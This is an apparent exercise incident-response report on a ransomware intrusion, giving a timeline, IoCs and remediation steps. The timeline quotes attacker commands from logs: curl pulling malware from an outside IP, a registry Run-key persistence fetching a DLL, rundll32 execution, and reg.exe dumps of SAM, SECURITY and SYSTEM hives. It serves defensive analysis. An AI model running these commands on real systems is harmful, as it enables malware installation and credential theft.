Team 2 - Incident "Achilles"

# Team 2 - Incident "Achilles" Severity: High # Executive Summary On the 19th of April, the dns external internet facing server is compromised and a Threat Actor moved lateraly towards the internal network which led to workstation with files encrypted. The IR team identified how the attacker compromised the infrastructure thanks to the logs at our disposal and remediated the incicents accordingly. Multiple assets were affected but the most impact is the files that were encrypted on 5 workstations listed in the report. # Recommendation The IR team recommendations the following course of action to follow: - Block and detect the reported IoCs in the dedicated section; - Restrict SSH (or any remote control access) access from every exposed internet service; - Restrict network access rules (firewall) from DMZ to Internal network; - Install EDR solutions to block infection attempts - Block login attemps using IP/geolocation restrictions # Timeline (incident details) **2023-04-19 06:33** - Threat Actor connects to the external DNS server (nsdmz) using `suzan.paulson` over ssh **2023-04-19 06:37** - Threat Actor compromise the `nsdmz` `sh -c curl --insecure https://11.0.10.20/getFile/Exaramel-Linux -o centreon_module_linux_app64` **2023-04-19 06:45** - From `nsdmz`, the Threat Actor moves lateraly to `hqws1005` **2023-04-19 06:45:36.389** - hqws1005.commensurate.tech - System - File created - `C:\Windows\wsmprovav.exe` **2023-04-19 06:47** - The threact actor connected to the DC using the account `suzan.paulson` (EventID 4624 logon type 3). **2023-04-19 06:47:15.874** - hqws1005.commensurate.tech - System - File created - `C:\Windows\DvLTdOwB.exe` **2023-04-19 06:47:15.953** - hqws1005.commensurate.tech - Registry value - `HKLM\System\CurrentControlSet\Services\Windows Check AV\ImagePath - %%systemroot%%\DvLTdOwB.exe` **2023-04-19 06:47:15.987** - hqws1005.commensurate.tech - Process Create - `C:\Windows\DvLTdOwB.exe` **2023-04-19 06:47:16.399** - hqws1005.commensurate.tech - DvLTdOwB.exe - Process Create - `cmd.exe` **2023-04-19 06:48:04.129** - hqws1005.commensurate.tech - `reg.exe - Process Create - ADD HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d "C:\Windows\wsmprovav.exe http://11.0.10.20:8080/getFile/wsmprovav.dll C:\Windows\wsmprovav.dll"` **2023-04-19 06:48:04.121** - hqws1005.commensurate.tech - reg.exe - Registry Set - HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth => `C:\Windows\wsmprovav.exe http://11.0.10.20:8080/getFile/wsmprovav.dll C:\Windows\wsmprovav.dll` **2023-04-19 07:31:53.786** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - Process Create - `"C:\Windows\wsmprovav.exe" http://11.0.10.20:8080/getFile/wsmprovav.dll C:\Windows\wsmprovav.dll` **2023-04-19 07:31:54.811** - hqws1005.commensurate.tech - File created - `C:\Users\suzan.paulson\AppData\Local\Microsoft\Windows\INetCache\IE\LNK9953E\wsmprovav[1].dll` **2023-04-19 07:31:54.930** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - Process Create - `C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\wsmprovav.dll,Start` **2023-04-19 07:31:54.940** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - Process Create - `rundll32.exe C:\Windows\wsmprovav.dll,Start` **2023-04-19 07:50:57.215** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - cmd.exe - Process Create - `cmd.exe /k C:\Windows\System32\oradump.exe` **2023-04-19 07:50:31.905** - hqws1005.commensurate.tech - File created - `C:\Windows\System32\oradump.exe` **2023-04-19 07:50:57.377** - hqws1005.commensurate.tech - File created - `C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\python39.dll` **2023-04-19 07:50:57.377** - hqws1005.commensurate.tech - File created - `C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libssl-1_1.dll` **2023-04-19 07:50:57.408** - hqws1005.commensurate.tech - File created - `C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\sqlite3.dll` ... **2023-04-19 07:50:57.446** - hqws1005.commensurate.tech - Process Create - `C:\Windows\System32\oradump.exe` **2023-04-19 07:50:57.669** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\sam C:\Users\SUZAN~1.PAU\AppData\Local\Temp\brmirn"` **2023-04-19 07:50:57.840** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\security C:\Users\SUZAN~1.PAU\AppData\Local\Temp\lyniegk"` **2023-04-19 07:50:57.876** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\system C:\Users\SUZAN~1.PAU\AppData\Local\Temp\rbmhrzgnm"` **2023-04-19 07:50:57.876** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c C:\Windows\system32\cmd.exe /c "ver"` **2023-04-19 07:53:01.572** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\system C:\Users\SUZAN~1.PAU\AppData\Local\Temp\rbmhrzgnm"` **2023-04-19 07:50:57.876** - hqws1005.commensurate.tech - rundll32.exe C:\Windows\wsmprovav.dll,Start - Process Create - `cmd.exe /k "C:\Windows\System32\mslog.exe -o C:\Windows\System32\mslog.txt"` **2023-04-19 08:07:03.668** - hqws1005.commensurate.tech - rundll32.exe C:\Windows\wsmprovav.dll,Start - Process Create - `cmd.exe /k "taskkill /F /IM mslog.exe"` **2023-04-19 08:07:33.994** - hqws1005.commensurate.tech - rundll32.exe C:\Windows\wsmprovav.dll,Start - Process Create - `cmd.exe /k "nltest /dclist:commensurate"` **2023-04-19 08:08:48.921** - hqws1005.commensurate.tech - Process Create - cmd.exe /k "del /Q C:\Windows\System32\oradump.exe C:\Windows\System32\mslog.exe C:\Windows\System32\mslog.txt" **2023-04-19 08:17** - The threat actors connects to the DC using Suzan Paulson's domain admin account (suzanpaulson-da) over RDP **2023-04-19 08:27** - Encryption occurs on the following workstation: ``` **2023-04-19 08:25:20.980** - hqws1001.commensurate.tech - File Created - C:\Users\Default\Desktop\Statistics_DouEhb.xlsx.crypt ... **2023-04-19 08:26:01.544** - hqws1002.commensurate.tech - File Created - C:\Users\Default\Desktop\Notes_xYfcWx.doc.crypt ... **2023-04-19 08:26:43.982** - hqws1003.commensurate.tech - File Created - C:\Users\Default\Desktop\Statistics_DouEhb.xlsx.crypt ... **2023-04-19 08:27:29.933** - hqws1004.commensurate.tech - File Created - C:\Users\Default\Desktop\Statistics_DouEhb.xlsx.crypt ... **2023-04-19 08:27:33.603** - hqws1005.commensurate.tech - File Created - C:\Users\Default\Desktop\Notes_xYfcWx.doc.crypt ... ``` **2023-04-19 08:28** - Threat Actor clear the logs (EventID 1102) on the DC # IoCs [IP ] 11.0.10.20 [URL ] http://11.0.10.20:8080/getFile/wsmprovav.dll [Reg ] HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth [Serv] HKLM\System\CurrentControlSet\Services\Windows Check AV\ImagePath [File] C:\Windows\wsmprovav.exe (7628FF7A3F79E314D30D65EE44529A15) [File] C:\Windows\wsmprovav.dll [File] C:\Windows\DvLTdOwB.exe (6983F7001DE10F4D19FC2D794C3EB534) [File] C:\Windows\System32\oradump.exe [DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\sqlite3.dll [DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\python39.dll [DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libssl-1_1.dll [DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libffi-7.dll [DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libcrypto-1_1.dll [DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\VCRUNTIME140.dll [Leak] C:\Windows\System32\mslog.txt [Enc ] C:\Users\Default\Desktop\*.crypt # Remediation steps ## Actions Take On the corporate firewall level, we have: - Blocked all outbound traffic to the malicious IP `11.0.10.20`; - Blocked all SSH traffic to the DMZ zone. ## Further actions to take Notify the user of the isue. Firewall: Block all source/destination 11.0.10.20 disabled the two accounts Suzan Paulson / suzanpaulson-da One all Worksatations: hqws1001.commensurate.tech hqws1002.commensurate.tech hqws1003.commensurate.tech hqws1004.commensurate.tech hqws1005.commensurate.tech -> kill process C:\Windows\wsmprovav.exe C:\Windows\wsmprovav.dll C:\Windows\DvLTdOwB.exe C:\Windows\System32\oradump.exe C:\Windows\System32\mslog.exe -> Stop the service "Windows Check AV" -> Remove the service "Windows Check AV" -> Remove file C:\Windows\wsmprovav.exe C:\Windows\wsmprovav.dll C:\Windows\DvLTdOwB.exe C:\Windows\System32\oradump.exe C:\Windows\System32\mslog.exe C:\Windows\System32\mslog.txt C:\Users\SUZAN~1.PAU\AppData\Local\Temp\* -> Remove key registry reg load HKU\Username C:\Users\%username%\NTUSER.DAT HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth reg unload HKU\Username -> Remove all file crypt -> Restore file change the password accounts: Suzan Paulson / suzanpaulson-da Enable the accounts: Suzan Paulson / suzanpaulson-da # Next course of action The IR team needs to perform forensic acquisition and investigate how the attacker compromised the DC further. It is still very unclear how the attacker started the malware on the other computer. But as Suzan's domain account was available, the threat actor could have multiple means to deploy the malware on the other workstations, hence encrypt the workstation.